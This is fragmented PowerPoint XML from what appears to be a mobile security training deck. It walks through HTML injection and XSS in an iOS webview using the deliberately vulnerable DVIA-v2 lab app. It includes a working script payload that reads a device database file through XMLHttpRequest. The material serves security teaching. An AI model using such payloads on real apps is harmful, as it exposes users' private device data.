                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1822739905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>What about iOS ?</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 4" descr="Stickers sur le thème Question Emoji | Redbubble">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1886D4-46CE-6586-86BF-F9B7387D1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558" y="3710562"/>
            <a:ext cx="1069716" cy="106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2992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600" dirty="0" err="1"/>
              <a:t>UlWebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in iOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> apps to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>webview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>render</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> HTML code. If user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> not output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>correctly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>advantage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> JavaScript or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>render</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> HTML in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> of the app.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="16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5" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{747264C0-DCFA-4110-8723-F64F8A04B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68391"/>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6509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600" dirty="0"/>
              <a:t>Open DVIA-v2 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Webview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Issues </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the menu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> click on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Start Challenge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>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5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="27021" t="44298" r="35463" b="5783"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217334" y="2601248"/>
            <a:ext cx="4310744" cy="3684396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8E5610C-8B4A-499D-97E3-EDE58AF0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196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600" dirty="0" err="1"/>
              <a:t>Given</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>webview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>let's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> HTML tags and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>correctly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> or not:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;h1&gt;Hello&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>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6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3593934" y="3305778"/>
            <a:ext cx="2628898" cy="3258536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CCB800C-C925-4623-9DA8-FD7E7FCE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96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sz="1800"/>
              <a:t>Default IDE : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.android.com/studio/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Create Android apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Debug apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Logcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Create/Manage emulators</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>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fr-FR" err="1"/>
              <a:t>Emulator</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12292" name="Picture 4" descr="https://pic.clubic.com/v1/images/1831854/raw?fit=max&amp;width=1200&amp;hash=ad604db77508e0e6445eca1fd03d35ff47467f3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37" y="4385385"/>
            <a:ext cx="3638550" cy="1552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044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600" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>confirms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have HTML injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>progress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> phone files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>?</a:t>
            </a:r>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9 : Exploiting XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CCB800C-C925-4623-9DA8-FD7E7FCE3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508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fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> XSS :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; a = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</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a.open</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GET','file</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private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/var/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wireless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Library/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Databases</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DataUsage.sqlite</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true</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a.send</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alert</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a.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Output :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="16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9 : Exploiting XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="12128" t="33747" r="13893" b="8482"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288973" y="3170077"/>
            <a:ext cx="6762570" cy="3350490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B081B21-0E9F-41C7-BDE2-A96849C1C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6735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fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> XSS :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
